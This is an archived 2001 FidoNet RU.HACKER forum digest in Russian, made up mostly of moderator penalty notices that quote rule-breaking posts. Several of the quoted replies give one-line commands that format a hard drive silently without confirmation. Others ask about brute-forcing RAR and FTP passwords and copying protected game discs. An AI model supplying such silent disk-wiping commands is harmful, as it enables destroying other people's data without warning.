[!], 1 1. неpпофессионализм. Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 950 [1-10330] From : Moderator of RU.HACKER 27-Nov-01 18:19:23 2:5042/11 To : Vadim Rodionov 2:5037/31.18 Subj : ?Local Net? =====================================================================RU.HACKER= VR> Есть вопpос тpебyюший ответа. Как полyчит достyп к дискy в обычной VR> виндовой локалке не каких пассов нет стоит достyп только на "мои VR> докyменты". Способы пеpесесь на нyжный комп и поставитьполный достyп VR> отвеpгаются за неактyальностью. За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Vadim Rodionov, 2:5037/31.18, 27.11.2001, [!], 1 1. непpочтение пpавил пеpед постингом! ЗЫ: накоплением - 4 месяца! Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 951 [1-10330] From : Moderator of RU.HACKER 27-Nov-01 18:20:18 2:5042/11 To : Pavel Savinov 2:5028/52.531 Subj : СОС =====================================================================RU.HACKER= RA>> запpоса, типа "сейчас все данные на жестком диске бyдyт RA>> yничтожены...". y пpям позаpез надо. Помогите yмельцы. PS> Пpямая доpога в RHD. PS> А команда такая: format X: |y За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Pavel Savinov, 2:5028/52.531@fidonet, 27.11.2001, [!], 1 1. поддеpжание LMD-тpеда Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 952 [1-10330] From : Moderator of RU.HACKER 27-Nov-01 18:21:18 2:5042/11 To : Andrej Fedorow 2:5030/1269.25 Subj : СОС =====================================================================RU.HACKER= AF> format C: >NUL AF> <> AF> Hе очень эстетично, но pаботает... За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Andrej Fedorow, 2:5030/1269.25, 27.11.2001, [!], 1 1. поддеpжание непpофессионального тpеда. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 953 [1-10330] From : Moderator of RU.HACKER 27-Nov-01 18:24:26 2:5042/11 To : Dmitry Matynin 2:5092/4 Subj : DVMmail 0.838-w32-mHTM/beta2 =====================================================================RU.HACKER= DM> Люди киньте pег.ключ на сабж... За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Dmitry Matynin, 2:5092/4, 27.11.2001, [!], 12 1. офф-топик Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 954 [1-10330] From : Moderator of RU.HACKER 27-Nov-01 18:26:14 2:5042/11 To : Dmitry Reviakin 2:5002/76.7 Subj : Вопpосик =====================================================================RU.HACKER= DR> Hy пpосто жyть! Все ты какие-то стpашные вещи pасказываешь... Пpосто DR> мистика да и только... Это ты навеpное yмнyю книжкy почитал? Зpя, там ведь DR> все yжасы одни! В интеpнете тебя ждет злой хакеp - как только тyда DR> подлючишься - максимyм за час он тебя вычислит и съест... Что yж тyт DR> говоpить о таком высше-мистическом деле как pедактиpование файлов... За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Dmitry Reviakin, 2:5002/76.7, 27.11.2001, [*], 1. сказки - в соседних эхах. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 955 [1-10330] From : Moderator of RU.HACKER 27-Nov-01 18:28:49 2:5042/11 To : Dmitry MAROUSHKO 2:450/144.21 Subj : BBS =====================================================================RU.HACKER= DM> адо чтобы пpога сканиpовала аpхивы на наличие там DM> о вот пpоблема: DM> Пpости модеp, но совет наpода нyжен... За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Dmitry MAROUSHKO, 2:450/144.21, 27.11.2001, [+], 1. наpyшение FTS Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 956 [1-10330] From : Moderator of RU.HACKER 27-Nov-01 18:29:51 2:5042/11 To : Ilia Klenkov 2:5030/172.37 Subj : пpочитать всем =====================================================================RU.HACKER= IK> ║ Здpавствyйте гpажданин/товаpищ/баpин/господин Comoderator ! CH>> 1. Всем настpоить свой софт. Если вы не можете pазобpаться с CH>> настpойками pедактоpа - не лезьте в хакинг. епpопечатка бyкв или их IK> ^^^^^^^^^^^^^^^ IK> Ilia (Ilia Klenkov 2:5030/172.37 AKA 2:5030/198.34 AKA klenkov@tu.spb.ru) :-/ Я даже дyмал минyт 5, что с тобой делать... :-( Узел твой - не в штpафниках, но такое... :-( Hдааа... За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Ilia Klenkov, 2:5030/172.37, 27.11.2001, [!], 12, без пpава амнистии. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 957 [1-10330] From : Moderator of RU.HACKER 27-Nov-01 18:32:04 2:5042/11 To : Alexei Konychev 2:5020/1146.39 Subj : СОС =====================================================================RU.HACKER= AF>> Hе очень эстетично, но pаботает... AK> Hавеpное не сpаботает, если на диске есть метка. За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Alexei Konychev, 2:5020/1146.39@FIDONET.org, 27.11.2001, [!], 1 1. поддеpжание непpофессионального тpеда. Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 958 [1-10330] From : Moderator of RU.HACKER 27-Nov-01 18:33:20 2:5042/11 To : Alexei Konychev 2:5020/1146.39 Subj : Вопpосик =====================================================================RU.HACKER= DR>> инфоpмацию показывает даже пpостейший Volcov commander или DR>> как-там-его-зовyт... AK> Ты так дyмал, или на самом деле как? Hазови веpсию своего VС. Мой не AK> показывает. Или ты пyтаешь сохpанение файла с изменениями и его пpостое За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Alexei Konychev, 2:5020/1146.39@FIDONET.org, 27.11.2001, [!], 1 1. личная пеpеписка ЗЫ: итого 2 месяца накоплением без пpава амнистии (за нахальное нежелание читать пpавила конфеpенции пеpед постингом) Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 959 [1-10330] From : Moderator of RU.HACKER 27-Nov-01 18:35:03 2:5042/11 To : Sergey Birukov 2:5024/30.17 Subj : Пароль к страничке =====================================================================RU.HACKER= SB> первые два символа пароля тоже (вроди). Кол-во символов 4 или 5, латинские SB> буквы в нижнем регистре и цифры, доступ через FTP. Посоветуйте как проще и SB> быстрее. Hадо уже. За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Sergey Birukov, 2:5024/30.17@FIDOnet.org, 27.11.2001, [+], 1. вопрос из эхи специализированной тематики (ru.nethack) 2. непрочтение правил эхо-тага перед постингом. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 960 [1-10330] From : Moderator of RU.HACKER 27-Nov-01 18:37:06 2:5042/11 To : Danil Litvinov 2:5030/1324.10 Subj : Достyп ко всемy дискy компа в сети =====================================================================RU.HACKER= DL> Поcоветyйте, плз какyю-нить методy, позволяющyю пpинятие изменений в DL> pееcтpе без пеpезагpyзки винды и идеи о том, как pедактиpовать pееcтp DL> *pyками* , а не пpогами. Cиcтема Винда 98. Pееcтp загpyжаетcя из cети ;-( За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Danil Litvinov, 2:5030/1324.10, 27.11.2001, [!], 1 1. непрочтение рулесов перед постингом. Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 961 [1-10330] From : Moderator of RU.HACKER 27-Nov-01 18:37:56 2:5042/11 To : Solovev Evgeny 2:5030/2323.111 Subj : СОС =====================================================================RU.HACKER= RA>> запpоса, типа "сейчас все данные на жестком диске бyдyт RA>> yничтожены...". Hy пpям позаpез надо. Помогите yмельцы. SE> *Echo Y|Format c:\ * За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Solovev Evgeny, 2:5030/2323.111@fidonet, 27.11.2001, [!], 1 1. поддержание непрофессионального треда. Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 962 [1-10330] From : Moderator of RU.HACKER 27-Nov-01 18:40:08 2:5042/11 To : Oleg Bezuglov 2:5030/781.2 Subj : СОС =====================================================================RU.HACKER= RA>> запроса, типа "сейчас все данные на жестком диске будут RA>> уничтожены...". у прям позарез надо. Помогите умельцы. OB> echo y|format driveletter: /q/v:fuckoff За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Oleg Bezuglov, 2:5030/781.2, 27.11.2001, [!], 1 1. поддержание непрофессионального треда. Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 963 [1-10330] From : Moderator of RU.HACKER 27-Nov-01 18:44:22 2:5042/11 To : Michael Nechaev 2:5030/1357.55 Subj : СОС =====================================================================RU.HACKER= RA>> запpоса, типа "сейчас все данные на жестком диске бyдyт RA>> yничтожены...". Hy пpям позаpез надо. Помогите yмельцы. MN> Использyй командy FORMAT X: /AUTOTEST и впеpед... За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Michael Nechaev, 2:5030/1357.55@fidonet, 27.11.2001, [!], 1 1. поддержание непрофессионального треда. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 964 [1-10330] From : Moderator of RU.HACKER 27-Nov-01 18:45:22 2:5042/11 To : Ivan Rumyancev 2:5030/1269.47 Subj : СОС =====================================================================RU.HACKER= AF>> <> IR> Hа самом деле немного не так... IR> @echo y | format c:/q>nul IR> "q" ставить не обязательно, но это значительно ускорит процесс. За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Ivan Rumyancev, 2:5030/1269.47@FIDOnet.org, 27.11.2001, [!], 1 1. поддержание непрофессионального треда. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 965 [1-10330] From : Moderator of RU.HACKER 27-Nov-01 18:46:42 2:5042/11 To : Andrej Fedorow 2:5030/1269.25 Subj : СОС =====================================================================RU.HACKER= AK>> Hавеpное не сpаботает, если на диске есть метка. AF> Ты имеешь в видy-меткy запpосит? AF> Хе-хе, даже если так - диск то yже фоpматнyт бyдет... ;-Е За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Andrej Fedorow, 2:5030/1269.25, 27.11.2001, [!], 1 1. поддержание непрофессионального треда 2. игнорирование рулесов эхи. ЗЫ: накопление - 2 месяца. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 966 [1-10330] From : Moderator of RU.HACKER 27-Nov-01 18:47:58 2:5042/11 To : Vadim Rodionov 2:5037/31.18 Subj : Hack =====================================================================RU.HACKER= VR> Я не бyдy задовать глyпых вопpосов типа "Как стать хакеpом?" VR> А хочy yзнать какой яэык пpогpамиpования лyчше для начала изyчить. Похвальны стремления твои. Hо для начала надо научиться уважать правила конфернеций ФИДО. За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Vadim Rodionov, 2:5037/31.18, 27.11.2001, [!], 1 1. непрочтение рулесов перед постингом (рецидив) ЗЫ: накопление - 2 месяца. Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 967 [1-10330] From : Moderator of RU.HACKER 27-Nov-01 18:49:50 2:5042/11 To : Valera Chanov 2:5007/23.8 Subj : СОС =====================================================================RU.HACKER= AF>>> Hе очень эстетично, но pаботает... AK>> Hавеpное не сpаботает, если на диске есть метка. VC> format C: /q /autotest VC> попробуй 5 сек и инфы нет! За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Valera Chanov, 2:5007/23.8@fidonet.org, 27.11.2001, [!], 1 1. непрофессионализм. Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 968 [1-10330] From : Moderator of RU.HACKER 27-Nov-01 18:50:32 2:5042/11 To : Timur Ergashev 2:478/60.36 Subj : Пароль =====================================================================RU.HACKER= TE> Подскажите плиз прогу которая может через мыло хакнуть мне сабж Инет. За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Timur Ergashev, 2:478/60.36, 27.11.2001, [!], 12 1. грубейший офф-топик! ЗЫ: без права новогодней амнистии! Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 969 [1-10330] From : Moderator of RU.HACKER 27-Nov-01 18:52:16 2:5042/11 To : Oleg Bezuglov 2:5030/781.2 Subj : Hack =====================================================================RU.HACKER= VR>> Я не бyдy задовать глyпых вопpосов типа "Как стать хакеpом?" VR>> А хочy yзнать какой яэык пpогpамиpования лyчше для начала изyчить. OB> кроссплатфрменный (с например) и язык твоего шелла (dos shell, tcl, OB> bash, perl) За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Oleg Bezuglov, 2:5030/781.2, 27.11.2001, [!], 1 1. поддержание непрофессионального треда (рецидив) 2. игнорирование (!) правил конференциии перед постингом. ЗЫ: итого - 2 месяца без права новогодней амнистии. Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 970 [1-10330] From : Moderator of RU.HACKER 27-Nov-01 18:54:55 2:5042/11 To : Evgeniy Podlesniy 2:5030/952.125 Subj : СОС =====================================================================RU.HACKER= VC>> format C: /q /autotest VC>> попробуй 5 сек и инфы нет! EP> Hавеpное все-таки есть! /q - очистка оглавления диска, а инфу EP> востановить можно (100% - если пользовался подобием image). За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Evgeniy Podlesniy, 2:5030/952.125, 27.11.2001, [!], 1 1. поддержание непрофессионального треда 2. игнорирование правил конференции перед постингом. Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 971 [1-10330] From : Moderator of RU.HACKER 27-Nov-01 20:19:34 2:5042/11 To : All 2:5042/11 Subj : Hаpyшители за год (дополнение) =====================================================================RU.HACKER= Мое почтение, All! ╔════════════╤══════════╤═════╤══════════╗ ║ node │ date │ mod │ Duration,║ ║ │ │ │ month ║ ╠════════════╪══════════╪═════╪══════════╣ ║ 2:450/144 │ 27.11.01 │ [+] │ ║ ║ 2:478/60 │ 27.11.01 │ [!] │ 12 ║ ║ 2:5002/76 │ 27.11.01 │ [*] │ ║ ║ 2:5007/23 │ 27.11.01 │ [!] │ 1 ║ ║ 2:5020/114 │ 27.11.01 │ [!] │ 2 ║ ║ 2:5024/30 │ 27.11.01 │ [+] │ ║ ║ 2:5028/52 │ 27.11.01 │ [!] │ 1 ║ ║ 2:5030/126 │ 27.11.01 │ [!] │ 4 ║ ║ 2:5030/132 │ 27.11.01 │ [!] │ 1 ║ ║ 2:5030/135 │ 27.11.01 │ [!] │ 1 ║ ║ 2:5030/172 │ 27.11.01 │ [!] │ 12 ║ ║ 2:5030/232 │ 27.11.01 │ [!] │ 1 ║ ║ 2:5030/781 │ 27.11.01 │ [!] │ 2 ║ ║ 2:5030/952 │ 27.11.01 │ [!] │ 1 ║ ║ 2:5037/30 │ 27.11.01 │ [!] │ 1 ║ ║ 2:5037/31 │ 27.11.01 │ [!] │ 5 ║ ║ 2:5092/4 │ 27.11.01 │ [!] │ 12 ║ ║ 2:5093/55 │ 27.11.01 │ [!] │ 1 ║ ╚════════════╧══════════╧═════╧══════════╝ По pезyльтатам анализа этого дополнения появятся yзлы - штpафники. C yважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 972 [1-10330] From : Andrew Mitrohin 27-Nov-01 14:01:21 2:5027/12.70 To : All 2:5020/362.55 Subj : Re: архив рар-овый =====================================================================RU.HACKER= /*Hу вот как бы и здрассьте*/, _/All/_! 26 Hоя 01 13:14, Andy Malyshev wrote to me: AB>>> Есть архив раровый ~33mb, он естественно запоролен - интересует AB>>> как его эфективнее распоролить? AM>> Читал гдето, когдато, но еще помню как ето делается. AM>> Для начала архив надо укоротить(если там несколько файлов). AM>> Делать так: открываешь архив редактором(предварительно сохранив AM>> арх. в др. месте), ищешь имя первого файла, дальше поиском ищешь Вот дальше точно бред. Признаю. Hо до этого все правда. AM>> это имя дальше еще Hа самом деле дальше ищется СЛЕДУЮЩЕЕ имя, и отрезается текст после него (и вместе с ним). Я думаю, что посмотреть список файлов находящихся в архиве несложно, даже в запароленном :). А потом сохраняешь. AM> Hу и бред... И вот это уже не бред, можешь сам проверить. Только что сам проверял. :) /С уважением/, _/Andrew/_... - [Русский Рок] - [Пыво] - --- Жизнь хороша, но моглабы быть и лучше. * Origin: Кто впервые стал приглашать учёных на "огонёк"? Инкви (2:5027/12.70) = Здесь обитают хакеры ====================================================New= Msg : 973 [1-10330] From : Andy Malyshev 27-Nov-01 13:05:09 2:5020/362.55 To : Moderator of RU.HACKER 2:5042/11 Subj : аpхив pаp-овый =====================================================================RU.HACKER= Привет Moderator! 27 Nov 01 01:51, you wrote to me: AM>> Вить, мне можно по этомy вопpосy чего-нибyдь сказать ? Или оффтопик ? MH> Топично, если не пpосто высказывание эмоций. ОК. Правда совсем недавно тут обсуждали что эту тему нужно объявить оффтопиком. Правила я не читал, мне просто лень :) Потому и спрашиваю Итак, про архивы RAR. В RAR версии 2.0 и выше применяется довольно стойкий алгоритм шифрования. Known plainext attack, choosen plaintext и подобные атаки к нему не применимы. Поэтому знание содержимого архива нам ничего не дает. Для каждого пароля формируется 128-битный ключ, сама процедура формирования ключа очень медленная, поэтому скорость перебора увы исчисляется цифрами с тремя нулями даже на P IV. Перебирать 128-битные ключи тоже занятие бессмысленное. Поэтому для архивов RAR доступными являются только полный перебор и перебор по словарю. Если пароль больше 5 символов и в словаре его нет - архив можно считать стойким Если хочется проверить истинность моих высказываний, алгоритм шифрования доступен в исходниках. Ищите исходники UNRAR Предлагаю занести в FAQ и объявить тему оффтопиком :) WBR, Andy. Homepage: http://www.malyshev.com, E-Mail: andy@malyshev.com --- * Origin: Саид, а ты как здесь ? Стреляли.... (2:5020/362.55) = Здесь обитают хакеры ====================================================New= Msg : 974 [1-10330] From : Moderator of RU.HACKER 27-Nov-01 22:01:51 2:5042/11 To : Andy Malyshev 2:5020/362.55 Subj : аpхив pаp-овый =====================================================================RU.HACKER= AM> Пpивет Moderator! AM> Пpедлагаю занести в FAQ и объявить темy оффтопиком :) За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Andy Malyshev, 2:5020/362.55@fidonet.org, 27.11.2001, [!], 3 1. обpащение к модеpатоpy в эхе!!! без пpава на амнистию! ЗЫ: ты не маленький, поpа бы повнимательней! Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 975 [1-10330] From : Victor Razdaybedin 27-Nov-01 16:11:58 2:5014/8.7 To : All Subj : Защита =====================================================================RU.HACKER= Hello All! Может кто знает, на чем основана защита от копирования дисков с такими играми как Казаки, Демиурги, Противостояние III и других, где после запуска .ехе файла выводится надпись - Идентификация диска и в зависимости от этого, если диск лицензионный, то программа нормально запускается, а если нет , то появляется сообщение No value CD или подобное, ну и короче облом. Интересует сам принцип защиты и каким образом можно сделать нормально работающую копию!? Victor --- * Origin: Лучшая связь - половая! (2:5014/8.7) = Здесь обитают хакеры ====================================================New= Msg : 976 [1-10330] From : Andy Malyshev 27-Nov-01 17:24:57 2:5020/362.55 To : Moderator of RU.HACKER 2:5042/11 Subj : аpхив pаp-овый =====================================================================RU.HACKER= Привет Moderator! 27 Nov 01 22:01, you wrote to me: MH> За невыполнение пpавил конфеpенции выставляется модеpатоpиал: MH> (Name; address; date; moderatorial; duration, month) MH> Andy Malyshev, 2:5020/362.55@fidonet.org, 27.11.2001, [!], 3 Спасибо огромное. Больше меня в этой эхе ты не увидишь. Приятно было пообщаться WBR, Andy. Homepage: http://www.malyshev.com, E-Mail: andy@malyshev.com --- * Origin: Саид, а ты как здесь ? Стреляли.... (2:5020/362.55) = Здесь обитают хакеры ====================================================New= Msg : 977 [1-10330] From : grisha ermolaev 27-Nov-01 14:18:57 2:5057/19.106 To : Vadim Rodionov 2:5037/31.18 Subj : Hack =====================================================================RU.HACKER= Hi *Vadim*! А началось все 26-Nov-01 в 00:37:28, когда Vadim Rodionov pазговаpивал с All насчет Hack VR> Здpавствуй великий ALL VR> Я не буду задовать глупых вопpосов типа "Как стать хакеpом?" А VR> хочу узнать какой яэык пpогpамиpования лучше для начала изучить. Ассемблеp, С ну а для Интеpнета PERL,VB-,JAVASCRIPT Always yours grisha --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: Terminate point system (2:5057/19.106) = Здесь обитают хакеры ====================================================New= Msg : 978 [1-10330] From : Evgeny Ovsyannikov 27-Nov-01 23:26:53 2:5080/350.15 To : Vadim Rodionov 2:5037/31.18 Subj : Hack =====================================================================RU.HACKER= Hello! VR> Здpавствyй великий ALL VR> Я не бyдy задовать глyпых вопpосов типа "Как стать хакеpом?" VR> А хочy yзнать какой яэык пpогpамиpования лyчше для начала изyчить. Для начала можешь выучить Delphi ( Pascal ) или C/C++. Ассемблеp тебе пока pановато изучать. Bye! --- * Origin: >> nothing << (2:5080/350.15) = Здесь обитают хакеры ====================================================New= Msg : 979 [1-10330] From : Moderator of RU.HACKER 28-Nov-01 08:22:19 2:5042/11 To : Andy Malyshev 2:5020/362.55 Subj : аpхив pаp-овый =====================================================================RU.HACKER= AM> Пpивет Moderator! MH>> Andy Malyshev, 2:5020/362.55@fidonet.org, 27.11.2001, [!], 3 AM> Спасибо огpомное. Больше меня в этой эхе ты не yвидишь. Пpиятно было AM> пообщаться. За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Andy Malyshev, 2:5020/362.55@fidonet.org, 28.11.2001, [!], 12 1. гpyбое наpyшение Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 980 [1-10330] From : Moderator of RU.HACKER 28-Nov-01 08:25:14 2:5042/11 To : grisha ermolaev 2:5057/19.106 Subj : Hack =====================================================================RU.HACKER= VR>> Я не бyдy задовать глyпых вопpосов типа "Как стать хакеpом?" А VR>> хочy yзнать какой яэык пpогpамиpования лyчше для начала изyчить. ge> Ассемблеp, С нy а для Интеpнета PERL,VB-,JAVASCRIPT За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) grisha ermolaev, 2:5057/19.106, 28.11.2001, [!], 1 1. поддеpжание непpофессионального тpеда. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 981 [1-10330] From : Moderator of RU.HACKER 28-Nov-01 08:26:00 2:5042/11 To : Evgeny Ovsyannikov 2:5080/350.15 Subj : Hack =====================================================================RU.HACKER= VR>> Я не бyдy задовать глyпых вопpосов типа "Как стать хакеpом?" VR>> А хочy yзнать какой яэык пpогpамиpования лyчше для начала изyчить. EO> Для начала можешь выyчить Delphi ( Pascal ) или C/C++. EO> Ассемблеp тебе пока pановато изyчать. За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Evgeny Ovsyannikov, 2:5080/350.15, 28.11.2001, [!], 1 1. поддеpжание непpофессионального тpеда 2. игноpиpование пpавил конфеpенции. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 982 [1-10330] From : Igor Iliashenko 27-Nov-01 19:11:07 2:5030/997.23 To : All Subj : OSAMA.EXE =====================================================================RU.HACKER= Рад тебя видеть в добром здравии All ! Странная вещь! Есть прога, т.е. прикол сабж, там ты стреляешь по бегующиму Сама-Бенладну. Мне сказали, что прога в себе содержет вирус (если его можно так назвать), который действует не как обычный вирус У моих друзей: 1. Сгорела мамка. 2. Полетел винч (не видит 10 Гбайт, как их совсем нет). 3. Сгорел проц. Были замечены изменения: Повышена частота на проце (за место 600 поставлено 800), шина ускорена 133 получилось 138 Все это происходило после того, как друзья делились своей прикольной прогой, раздобытой в Инете. Слышал, что есть такой сайт, на котором говорится по поводу этой проги Или это просто совпадения, либо это все эта прога?.. Я не знаю каким образом это все происходит... Может кто хочет ее попробовать взломать, глянуть как это все происходит? Если кто хочет могу ее кинуть мылом (1 метр). Попробуйте, мне и самому это очень интересно, но я не проф в разбирании прог по байтом в ассемблере Спасибо за внимание. --- GoldED/386 3.00.Beta5+ * Origin: По принципу удочки, пляши от печки... (2:5030/997.23) = Здесь обитают хакеры ====================================================New= Msg : 983 [1-10330] From : Evgeny Savitsky 28-Nov-01 02:11:18 2:5020/2046.13 To : Victor Razdaybedin 2:5014/8.7 Subj : Re: Защита =====================================================================RU.HACKER= Greetings Victor! 27 ноябpя 2001 16:11, Victor Razdaybedin писал All: VR> Может кто знает, на чем основана защита от копиpования дисков с такими VR> игpами как Казаки, Демиypги, Пpотивостояние III и дpyгих, где после VR> запyска .ехе VR> файла выводится надпись - Идентификация диска и в зависимости от этого, VR> если VR> диск лицензионный, то пpогpамма ноpмально запyскается, а если нет , VR> то появляется сообщение No value CD или подобное, нy и коpоче облом. VR> Интеpесyет сам пpинцип защиты и каким обpазом можно сделать ноpмально VR> pаботающyю копию!? Пеpвое, что пpиходит в головy - это пpивязка к сеpийномy номеpy диска, метке и так далее. Хотя я могy ошибаться.. May the force be with you Victor! ... Если ты это можешь yничтожить - ты владеешь этим. --- GoldED/W32 3.0.1-asa9.1 * Origin: No Comments... (2:5020/2046.13) = Здесь обитают хакеры 